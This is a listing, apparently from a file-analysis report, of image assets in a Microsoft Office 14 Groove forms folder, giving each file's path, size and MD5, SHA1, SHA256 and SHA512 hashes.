Filesize
706B

MD5
608a431effa9d928b1838902b17b1d7a

SHA1
9fe8979042d744a8445244bc94dd58037d5d405c

SHA256
a948df6b7a3e0a71c0b432a713d240d39072d553e0994c730ebe3c2d6c954e42

SHA512
1054affdf8277bbe061ee641b3b411e9fc388ed37f3fcd71d7e4472e0e1a005d1d1576c41efbe2ed63cce932cd40269dd2bf18b03431999d1339c18de868ec93

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

Filesize
1017B

MD5
be36e7bfeaa464529c3a0a41d5f1ff42

SHA1
9070fdef3849027e6fe69086e9f1ef61177e01fe

SHA256
eeae37d50c959b31fd3d502764e200f7d31faa600052de4084283d1a17ac8aff

SHA512
1535ee1b0eb8fcf61123a048dfa65745d6ffe077484bf53adf4e1d2f3d258ad057c599a2d911d4cebcdb8eccb89d9e5cd8ee663e470de8ff7743e29f2be092bc

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

Filesize
1KB

MD5
e707d8f43afb6e941bd11ed22328d7a4

SHA1
527f138b61a97d7527a520685e1a65953d6f352d

SHA256
294360f15084665cfde3e6102784dd0f6d1b2f53fa69800c4b1ff5aa4869fc10

SHA512
18ddc7c678a279a858f540686e4e2c6922cc49da43bde8b99d27adb53dbd0182b0ae2742a899037762da23dedb640a82d3439fd8c1d91a1079ff2d40dbea4457

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

Filesize
6KB

MD5
967f5cc3edc29375de3afdae649cab64

SHA1
aab9ab8340927cf31582e2c05efb91239b9d41b0

SHA256
78432f5c590e86f9590abfaa319566c518cbc246f712a44016b169d84920cec5

SHA512
84e4c4642741d1739ceba731ef1a7e60b1fa367dff143866a4b19ec1fe0d5b69929f78dc6a21f74bfef2aa90bb5bc3456391c6ed13d131f868a1c774ff9170e4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

Filesize
31KB

MD5
6afb2aabb682ae7a32b7e30189329516

SHA1
354373f025a9cfc13a44123cf5facb5c99cf993b

SHA256
64f37c6b8d09f9708a4b45b8514097560697acfcc83825303cc58185403e6d33

SHA512
9f358d8ee61fef9001973c9678b62b50f31c24e13dc5b0207262a272d996dd581076c2db9a75883c2917ab374616a4d50e21f667be1954c635555d6a7cae6d51

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

Filesize
5KB

MD5
ccdfc5961d5cdb3863140c79a952644b

SHA1
f018ed0f01680d46ace00d2b93a7ab76fae658fd

SHA256
5f33b5eeb5d0519f815931e0fe816d0abdeb7b96b4e341e1cebc27693cad1d67

SHA512
7e481b0dfbd454c5a2d09947ec4cad98f58f87e2010c0fd3d2e3a1bc5b2cba87a09e9b0d537ec689d4d7734cb758f1ac0374b5d5832157588ef89b8356d43ad9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

Filesize
22KB

MD5
3b90651ecd4f9eff563a116770d6f32e

SHA1
f821a1f9ce4cd47e1a87a37b0ac46dc5bfb47aea

SHA256
5eff7e8fa0df7323e1b4f9cf78af9b969b1b6b08a7656ff8e7312fba21fc0345

SHA512
e394ffc098b51bb9cc2606fe3133a8752de4f308cfad11c514ffadbd615e954fcf6980d0d8279bef57e997d7d4ba2f78ba942682168e843c0b57eaccbb9f1257

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

Filesize
627B

MD5
fcadd75996b0b459616ef28ee5010b38

SHA1
00bbb542810df4e11f50b687682978cbddf8d69f

SHA256
8e1d677c4759e11a1874f8523c2bc2fb93b299f0049e76dbad8c1eeb147f8ea1

SHA512
62782bed45f1e9288f8feeceb8cd3d5f27b921bb6bc5dff2b20c73b1955b4d69b4cb2b4334ce86ca5b90f22f1a5869e9dafdb624e2a3b22a3bb8123e7a32e836

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

Filesize
8KB

MD5
8b07f456794ad5908eb4468a4150b73f

SHA1
5b629f5a86897d430ef8251d68c727d8b9c9f0ae

SHA256
b0d90fe0a4b51a6593cae30fff2f3358d720e1e1b6ce0e66558d954c8cc2e457

SHA512
994044dac5f194486f0d92312361b540766e0792ab28e295b069e74ae644e42d99887f256c7b6fb95e6f8543c6b0de0200edb1bcc756f3cf1c1f1248e1998773

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

Filesize
15KB

MD5
15910b13512cc21766bd40d6f0792ce8

SHA1
0d0888c78ceb5378b86e058c600b5c4520b2ebd7

SHA256
945136bbb68f5ac873d17facf69de83ea683c622439800054b79086607ed4818

SHA512
ff0e0398f82e9780de99410bb1f625f240512063559ee4ea639d1d227589719a9764bd5187a8e591f096181d2e66d65cd1ef5675753999a6ab03c1981aaa63a6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

Filesize
6KB

MD5
6c2d69209e406618c0521779900f9853

SHA1
9bad160f9634ff93740269a9a648207e7abcefcb

SHA256
34199fd004dd6b9a8384de024c010c948d4ab95b640523808f444e91e76932cd

SHA512
dec8d8e3c72fdeac319428aa91c44bb3a2a0af3ffd7ea55fb0bcf65183da067165c58e422e7f2f9d61fea3b135eae271546321553d187d775dfcce64e04db299

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

Filesize
20KB

MD5
bfe4fc960f74aa4551497a196ca46710

SHA1
08fc30b6a5837d6589af670dd1422e9b84a1ea74

SHA256
13f48b3549f2c4ffc03b0d05aff8d4a0a95c77c120f76d3f5e50a2b12362e730

SHA512
013cfb45ee8d3e29a01c5e90df394739072dccb814ecc88573f4785aa3451c03f71ef6cd666bbef03b1835d7f5fee2757fcf3de50717d18fbb0357b512d47108

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

Filesize
6KB

MD5
24b3c31772b88eb12044f35f7b00b5f8

SHA1
a788b0bdeaaa10cd1445293b6ee1d5d8e869bfb5

SHA256
8ed33a07669835fb3ba27759e23206aca76a00832efb2dfdb7999175044f381c

SHA512
e9ed079dc8fd404d74bcd3d873da33dbdd9c7a6364141232d25ce9d16218b2b60c6e1774bd46a030096dfbd6883f102762d9393ab367fa0f371e6eede1348385

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

Filesize
15KB

MD5
961e3e6ac177a314d910829355474d38

SHA1
a22815969ef602f5e60ec96b5d05ac5468842668

SHA256
7dc8564e2f1e7ac9a6ef8fc5fdb054d25ad355123bbd08687f6a7680bed0bbce

SHA512
29c752bbde36a8247a9259b9b3cbf99a7cf72bc09afaa6f9787c59de977cf21445d0ca7829cb301e2965aae6786ef10ba5eba8bb13e8e0a4dcc0a2d78279c8ac

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

Filesize
3KB

MD5
91fe556c57c8c4143e6553d213200da6

SHA1
f5f8df2ea8e64dda85e368d1816bfc26fb1f5b57

SHA256
00a3b3ece2cac7889781b50a7f649d70433b3542533edfb5d9b23c3d8f3c9091

SHA512
692a4db5f576543e72f50a0a110720ead90057af1ec3b457008bb6a2703b5596cffdfe7db95df11b611fa3ea5a7c15134295df547f119a1de6f2429dd21de820

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

Filesize
2KB

MD5
c88e1d74f8c40b573c404d48085db60c

SHA1
93753c3f380a6e4894c48069bc092c7bee493191

SHA256
d8dd1e686641c00a2065141ecbfb8b4b76c9bcfd66c8652a1a5c7297da0d0d12

SHA512
67a9d6f9d37c5eb7bd260f4fbaa5bcd59607955c26e5b9fe292b42482b3f3015a6d63e29cd957923065cee0133a8c644cef656065029aa5000298198ae569480

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.ICO

Filesize
839B

MD5
7d5c1037d47d9ec11555c27944b8e806

SHA1
cf3f0f36d637213af50a7eec3d49e9353246e376

SHA256
4bd8a6edd9f557aff3ae9042e54e1588fc6a23d7cd5a676eed3696a112b10867

SHA512
33046e576c55ca9520eaf8c1105d2632ece770177e5d8808f6f8c93e9eff489104d1b2487833e9558db242369a88b12490b56547d9faa7e6c0ca638249b30346

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

Filesize
7KB

MD5
3bc7a94f7b801647b74513c6d0230bd5

SHA1
d6bca6c0b38ab3e66e7c817d21cfd03e4d2e4d2a

SHA256
6c35569f8c19bf345d72f8caec3c3d24adca0552ed6b8e1680d8e32923914328

SHA512
9c2ebd6a768a9aea23f422e2bbf56486ffd27ea87337dd6fae9c5e63449142c3f1727ad86579b4aaccaf7d7cc01f971cd0d22ee35557bcd9b6849bcd28a98e93

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

Filesize
776B

MD5
5e874777496e81f07c70df68a7ef2657

SHA1
b7267b8b56286037408669d5922a344033953ed3

SHA256
45c5d5ac6ed8519b8230a8641b72fe119357da9a2bc2748c8384243c229e312b

SHA512
f0d2a4a4b47d7fa11cab70e9b5f005b0a95bc9f2b28e9bb56ee5c3f933205b3650d8cc9c721c44d4f0ea3732edebcd8764117f4d29d9d242173357401252b146

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

Filesize
844B

MD5
d58f2091c6677dff1868f63c8e9fe89e

SHA1
05027097677fcddac06b17798bbe4b47aeccc211

SHA256
e16a328d997200f00e1e47a93f879c58f3d2c2af1c33d94d22963ce8c02fce3d

SHA512
9994ad8067c919c0dcd4ac1a7fb0c96a83706dffadce8e40fc6bb01f7ed42ca331e6679f25a354311ee679b58ece81e19fe2daaf097c60c5a992aac5845b018a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

Filesize
888B

MD5
160f0af3482741631e5df20885fa9af2

SHA1
5836b5957c58dbddebc079952f6466bb2cefe21c

SHA256
e854653d32b967235fb800c244859d42614af9f7bdcc9e40ff4fe45a2f2079ca

SHA512
817598dad004bf4fe73af0eb15a0593e83d5d9bca552364b8a918b7727e0dd27fb1cd9992344a758a209c9500c92d495df5d46b3c8fa24b288e7fa53b98b7159

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

Filesize
669B

MD5
ffe5c3fc28d23e4a6617c70ff04eb04d

SHA1
accbe421934ca8b49703a7e6c693b9a88c5ddf20

SHA256
dc65970cd217110239d6a08836239ab21383a7e36086b6db54130c6fbdd23fc4

SHA512
c9f7305f2e4c1a2491d054bafae81165083e41545de7ec7d5a011fa61ab790b986e2fecb4a56d7fccc0a03ef52388407a734061828aa66563d7f8483b9209c11

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\HEADER.GIF

Filesize
961B

MD5
bd601c4201dc11bd7868fa842c15c250

SHA1
e51cf76cf1eb65ae6976fb099a236efe68a384fd

SHA256
64701ccd2f3898612b962ad93e5482e74dbd826a9e5115bc17d9e002c25f86a1

SHA512
52b9e58aeed544d00fe6752640ceeca674e2f4a06c0e403fcb90bc17e46f31c4b83b81a1bee9081cc7f9ec597802950bb3f770fdbbf0faa2e4052c4a7fdbe6e1

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_OFF.GIF

Filesize
983B

MD5
d026c1aa50800a8952b0fc3da16d4f14

SHA1
0e5dfd47fd4700577257e5308015484cd9cff941

SHA256
a10cedd46e7af732fb770176146b3969efe434a073b924c6a2d2def1f0ff7c38

SHA512
f3fea4054778316d2df263227cc47b7146c19354b17dc1a49619135ce86a1cf4900d761a00d8ec8724d78506d747004faf63f3b1b75d4e21ffdf3b1ff5b185e6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF

Filesize
788B

MD5
4f539220ae4f01f79a54593810529b9a

SHA1
843652f6d3bb1b75a47a81da9f10705fa8930767

SHA256
e0d4c6788abc41377e84c1d74bd11a680677aa8c8b2317bb5f495c8115e07708

SHA512
263a42959b9b830b10a482c5cef781e569f920764d4f0153cb21b041b7ff980d1525b3752eb2dac39633f717ac1eeac7541af901784e37ba458e22434cc43aa9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\HEADER.GIF

Filesize
2KB

MD5
8f4a2ab5bfa847aabc6cc685261b955f

SHA1
1bc48eeb4c747d696e6ee734d7feeb4ec458fc49

SHA256
56ae85a96abaab60442dd310fa79e4f25578ffde644ab5e0b263969f390729b8

SHA512
cd32049d596be3a71c92f067a4c26d14272901349d45f761fdab6dc09cb1236493195d398bfeeae6e37a4ffcadee03dd3480d85b312b68ffb0b31ad8d19cf6bc

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\HEADER.GIF

Filesize
3KB

MD5
11149e28c4a8082f312f9c3a5ded43af

SHA1
90dbe123ee745679676d2b407859ac0b2fd4f084

SHA256
21850bcd3d0b620e4be7fae5f2386e46464d16f56903597d27c2a18db557a468

SHA512
c6159b8d12b4f5247e0f8b5e4a9820ba198f9512679c9011dcd36b463a4046b1821dedf9fdd5a8cccaf95f786736dec18860c15b930ba2b60ef56b6a3163f855

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_OFF.GIF

Filesize
983B

MD5
9109c4986a05179246d4d2431d9bd165

SHA1
fa1ebe27e00072d1c66d6f0d21b92507187ef6bd

SHA256
73ee2cff4a0994d2cb909ed1570bccff798646142418f8a1e4de7461874013b6

SHA512
c6cb956248e93ba70a963cbe62c119d9a425fd979a6f41f2fa29349587638a709cb210bbb6eebc40d45fef8f950c0f2b16d96d4418e695674c891b803e929018

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\TAB_ON.GIF

Filesize
785B

MD5
9a319166108fe0b966b7355bfca40d45

SHA1
016ff0f71eb88bf655ca09a4ac5a3be4de01469c

SHA256
ba9435a5d6571dee554301f8163e4e8bc19cd49d989de90aacfbd9e41b3d09d8

SHA512
7dab2788a8a5720bd7482fbe76034d6142aa28f55072efef099f82ecd0d9601a073bfaedd2449348e1dc94192aeddbb708fc4558d14c89bf9e7e6b6daa8b7d1f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\STS2\background.gif

Filesize
754B

MD5
3351c11ddff79d6daaff88ad5bbff504

SHA1
7268ee003c0fc5bbf453bb65788908f1be3c5f44

SHA256
a9afa238dec5e5545b1fcf13e802a2cf1eacb7a6ce52393dd6b29becdd6f565e

SHA512
f5ecbcd4f2758dc575a601d1c15ce8b91531263490bd62db8c551cce01d3b594b315f32e0de381e5610589a7f28d1fe797068e1d6ced99bd365102b93b34ddf2

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_OFF.GIF

Filesize
885B

MD5
05ac9ec74060039170c1b1bcc3864337

SHA1
a175f2dbd6cf1b2efe1e1ab6b36996085f1efae8

SHA256
2731b2720b58de88b5ae99f5e762707c0089df3c8d7742627a0a61310c4be85e

SHA512
f116b8924797f6b9c08751d92b8eaf8c61a227544fabb1bf5b26e27c42febae1956f787c0f1c77921c79c301ca03efb56b9ce4b0fcb7e8dd7d99487e4b1146a4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Slate\TAB_ON.GIF

Filesize
885B

MD5
146d4eff7d9ad8955361ea80c00dc7b7

SHA1
4f7efc28a376606cd578baea9c6ef6b50954c4ee

SHA256
6640060458e14aa2abfe5f632d4af57e0887318b432eebe7f087812753fa5911

SHA512
97ae34b6d3fbfc3ad509c440aa16950257c66b116eb6d8172b040ca8497b93a14f36bec707087b6cdcc3914763d56cefc6d72f9677fc38c7a0eab7639ec35b6b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue\background.gif

Filesize
7KB

MD5
1329cfc04c812ede6c531cc60b4989d3

SHA1
f59d6ba7424a19f1991f243e64b1ec0b3f557ce0

SHA256
e2759c4d9792c5d4286801c12a7c41012334aa8a0023f12e95027c55e23dbb8c

SHA512
d8998acb667c26ef98ecab8e22b1f02cc0ab4a6b57aebbd151b9c0c7c9124af3a7ac7d9c3bfe055f8fb0798c320fba7a915f3731c3ef35587e5913c831d0b40a

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen\BUTTON.GIF

Filesize
949B

MD5
00f53bf7a7344a9a4c32db8f9a295721

SHA1
173b26598750b2ccabc755a7e726823f5ecfe6c6

SHA256
6db3ba27a8a0e0a540b260eddae10a0f271a9db2aa212bc91eb416e8b78955b3

SHA512
712e854951e3d2f550dec8b54866dc620aabeb4fbdff28c0674ed8c1232d664639c7604fdbf5c35aff0885c5e1d72ee388297627e50e962bc11a74184a6da604

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\HEADER.GIF

Filesize
26KB

MD5
bae8e4dfc2071c242954402f14bf2550

SHA1
248c5cc975b56a4de6e89a382f38fcfef6574be2

SHA256
09c1a7f37caf735f331533a0585c1d76a59899a2c60c5edeaabd32524b59f4ac

SHA512
401fd903493966125db84d8b1aba5660ede34114e55946aebfa7bc361edddc73bdb25ef498063929ce41d3d47d03ab2fedae3c9ea6b2a15687c9920bcceeada9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\background.gif

Filesize
1KB

MD5
8177f812847e082a945980b903b827a3

SHA1
f4bf931daae1b4470f2fef17943d7978f038433f

SHA256
e54c2c0575933c2b80444b50d0a3b94a1ba1f44cf2038bb95f711c08e1129ea9

SHA512
e3061f2f1084826080bdb096e10bd6083454933d5450b751b97db69f2c291e26720274c68d03c6c5c06bcf702320c048a26da393e902aae4d466896252df0e70

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF

Filesize
1KB

MD5
1c1fc32e724ecf3fc0dbe65e5958f16f

SHA1
8e03a1f4277d4b66c702fd2837afaf177d203079

SHA256
cfe139e220d0d43e4207d8437754f0fcc0f5bfe8e3bffc59e65b29fcd7cfe58e

SHA512
944af0a63fdf02c53e2335b33a0a2f1dde5ee384c81f2047af3ada14021063036824f682ff15a29d3a849221d417bd006f90daf5659f9c801b4ff6cfd5c1ce0c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.ICO

Filesize
839B

MD5
de5d989389cfee324bdaa35d7f6d0ebd

SHA1
c76de3e6cb20d581828fcc473f840fbfbc3a82fc

SHA256
7b26527a823ea15adf54935e0bb6872ec8fda81ffdae401bcd041d1486602905

SHA512
ed5c7e12131cc1d5458be399af00d55c756a08de324c5d93e8f726cc0d28b8f9b47adb04710366a6d970ae28f76cc4325dac233c2c04bae938315834c4f46cfa

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\ViewHeaderPreview.jpg

Filesize
3KB

MD5
4644bf472175740a6a2727241e5db6b4

SHA1
09a01aa34e911833744caaced1e2d41605c06e32

SHA256
99e111d457d0c79f3701096f6afc3a8b15d52425fce49b6c4ef07efe174198ff

SHA512
fd72d9d2dbbaf3f08bb1e3c167f8bcdbb31094ba6280e6549d82a6295897936120b3844c47968bfda30808d88c84849faaa565f3af6390c366b7e59e47c2cc2b

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\attention.gif

Filesize
3KB

MD5
850a3e22f04332056b6a238d85bf8a39

SHA1
7cdfba4efd212fbc7f575ba19549e2ab0fe4a0c1

SHA256
f1e4c6bcf1b7b4e4107acbe1194ba79ebd2205d7f96cb09eb7a0520b0adb054d

SHA512
446b8d03d62c08f567378f0306f9b2155642eb8694f06f2f4db2a55b1ddc896819d92dd568301863a03a8e83f1d2d03dade4efe4efb38837535d23a623b84c38

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePageBlank.gif

Filesize
20KB

MD5
19d86119f0398f144f3b4b14d016f2a3

SHA1
3ce16922570d8d51ef03d16949b91070d7e51136

SHA256
f9a5b1cced2dfe7e8d578300c8aa5c5da048ae3cf1150caf12c8c678eee482fa

SHA512
89466b7a5d3cfe1f4e745aaa232c04ff7cea185475f80f788608dbfb5f56e9e2532dc7183d2f691fc55d39a47523e2353e0ffd737f332e33799fd0c07404e1f9

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_choosefont.gif

Filesize
1KB

MD5
bb7f2af0302ed8d0034dbe983547b49f

SHA1
01d8d9f3d340090398abdf7769cfbef794f30401

SHA256
10082e7837024228e53549a838dff39319110f892b22f973c7b420c3a2427f7b

SHA512
f751cf7e3e1fb8818903dea50926a9026b6f0c57893ff9d4e569bb49a972f8b52316fe4b402598a527b9edf3936a3d381b63e515c0ae26d13cc38409dee6b370

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_italic.gif

Filesize
1KB

MD5
5a007de1830a3ef33e3f0a9e45d67827

SHA1
27ef4fa9de91c124e1085b0816a793e597bedc99

SHA256
60bb3057c3aec92690bbf84e4aceb571d9304ffce6292a6b2f171feb1b19942d

SHA512
27714025b617852b5304b91652c06fc4d9368e8506c64c998a5a3a07f39be8d38761444a1e1c37b2152612b1d9f812aa4d4ba5f8e3a0851c4b295ba4759e21d0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif

Filesize
1KB

MD5
3525607b8e50dc3557c8f539b37c816f

SHA1
b9f84fcf93ce43a6628bd3b13a296aaed6be5ffa

SHA256
e9bb0a5094f62d0b8630bdaf15e363dc48bc5d8eba7da2a31ebb1787a12dfa1e

SHA512
571a9e326645f1d9ffb43bf499876958230a2f620634fb39a6f5e76b6d23efc93bc8cd0dcd877d516b9b14cfe061507c110332e5db9efefe61796cf3f5566dbc

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF

Filesize
1KB

MD5
f5e326ef67221bcdea4baa150f40a27f

SHA1
a9759257a931cb3732a188dd46c1646e5931506d

SHA256
55d22544d2da536e8ee2b24e33a2115f8890b0653166b653163577d9936c00f8

SHA512
c6cc9e0758c422529d4c9a3fa497e11dea625d9de71db82c7dc87ad60d04fde9ba3fee9820693f3365379dce58aae0c35f74b9001e08895bcceafda6df791255

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\CALENDAR.GIF

Filesize
1KB

MD5
b6fc1327b84807a7333b4ebb69de027c

SHA1
98649df38f29c4798854fa0dfe1035bbafee3e46

SHA256
84eab7fce9044cd26d43bd2f58d6dde90396e044c9700dcbf0213e82e48ff8bc

SHA512
abe097a2d1ec17d89e72332413d435184814eb122b69fb8dd22bcfe30f2b845d443f2c40c29e0319170e4b3fec6510113e7e6f5081c553758aa73351d9067a57

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\DELETE.GIF

Filesize
1KB

MD5
0d69d134db735da15d17e7c8731bcf04

SHA1
fb6b055c87e486beb3199017fa20c604de3b5783

SHA256
7ebaf11a07dc7f28973f72e7199aa3aebf8baab5c9f3771ff815b97ba1738866

SHA512
8d9bfa1b31c538605407be5c28a1aaf9437ebb9870ba2fbc87932c3e36bcada3b380754cdb5d6081b0c2d482a30540bb05d0a66d864dbc92f82c4732f4565786

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF

Filesize
1KB

MD5
a7bd959654d665832fe9b35568430efd

SHA1
35c395b48889864248f24344acc32a1de68472fa

SHA256
9b725ab594b603f06f78a65bf13df9ba5bd16e9d7c1d8e1aecf66a72031b7578

SHA512
a393851ef93d937382409e3acec7f5eb84dc39f77398b16ee99c1f253a1c5a8444db9e27402a51520c971cafaf1ae6d956e463e2c910db64de1b1b5d89aaabbc

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg

Filesize
5KB

MD5
10af2dc351d79a0b2bd2db0f401876b9

SHA1
5b7e7c0a4d4d0c064592531ccd06e674bf78887d

SHA256
e0600519b12c026bbf0cb063c38a18777f12f2e4147f3ef249f1a9f91757cf16

SHA512
1d23d1f4fd18547fba62494e85a5d46969db8d8a1f73f7584a13504eefa6c6207f097bbef90c58dd08dfad48f2b28199d4bd9da13eaac64a50c2bd1fdd182caf

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIconsMask.bmp

Filesize
2KB

MD5
295a9915b8d64a9122bb2d1df97d24fc

SHA1
bf0e6df189903bf599f5c98b3ba98188576f198c

SHA256
2bdb4426caf693605adca0b2d01527cdf0ecc06fb981e5d8a6c5331838c33285

SHA512
47d54ddb3f7e28998fd7aee657bf5a78cc78fa26bf5d38d9ca5fce01cbb308ae0f342c11d1a4e18621c5164c49592731e30f837db47fbdda7991a4794b8e4888

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\LAUNCH.GIF

Filesize
1KB

MD5
6a1c1165ad526d7359ac952b7220b420

SHA1
40545c192f4fe47b73fe520e625bb10c850f52af

SHA256
5f4b9d28dc0bda92760602851e236b829a7b7b43b7f0a879fc295998e900c7f5

SHA512
a5acebc7ece6e3449a0c30a4b137e6ff4164db73a0b7fdb7fc88819c1d5541273a7bc1928c36beecb1b0582d3342b62ee58975527a7d31cfa5017215034acb2e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignleft.gif

Filesize
1KB

MD5
efb8ac475818007d44b31ff5d40a1536

SHA1
fe194146dafa5a2d55984ac491a98f0cdf4f787b

SHA256
029da53e5c6d93e9151e25cd406da57f378a0a6e1cac2245bb08295dae67b61f

SHA512
c330ed3c003fdd93fb52a80345b1d507e661ba56f6b77d79ed3d6e7fb838c276c1873f13897b74c98a8a3f7cd2a8300da0cc8ecbecaff158e41c4d40ba0ed7f3

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif

Filesize
1KB

MD5
3deda8cd85cd46009e7bf62cf2e37be0

SHA1
c5245cf8522902f7d17a2b8db1d01abe66d2430c

SHA256
5daa5d513b22fe8d5609687a6206538308f1f9f6e9def3f769bf49c6c8dd9b7d

SHA512
6b3de1d87e64ec2d93fae651d6b57b60aec252942781d307e7ce58283bf9830a158675688af7ad0ed4112d6511b79e58edeea43b2bae8780943e69b7d3764b28

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif

Filesize
1KB

MD5
334f2f144fc5bc9da2bc5b691ab9b5c8

SHA1
83a2cb1f64cc94fb5e81a88d38b441ce70802c50

SHA256
11e20f976faec6e5679c0f3bcd8a7ad2aaab886329d10e39d77daabcfe2801c9

SHA512
c29c81e74f6778bf4ad17485853704e9afe7555b9d58f2afd777a52161ccba26a0d91a8af38790d13ad56d02825abdb3cfdfbfd514e0471bcf2f1bb2c1c6f5e4

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_center.gif

Filesize
1KB

MD5
2c6177f4bf24e7e93dc032b91e688473

SHA1
4e767503b48304ab47fb78b1c83ba7d04a3c4414

SHA256
bbac625b3d0d5a0d3e2f11e96069e048ee184dd6cb5bc108fdcabfd3e82a8761

SHA512
a180160cdc8eca9a233e2928fc53aa20be6145179f032e57e638cc829e8c42f55f540f1ddf1757fa0eea2646bf5028adc9719d33161cf08edf940c3d07cd92d6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_decreaseindent.gif

Filesize
1KB

MD5
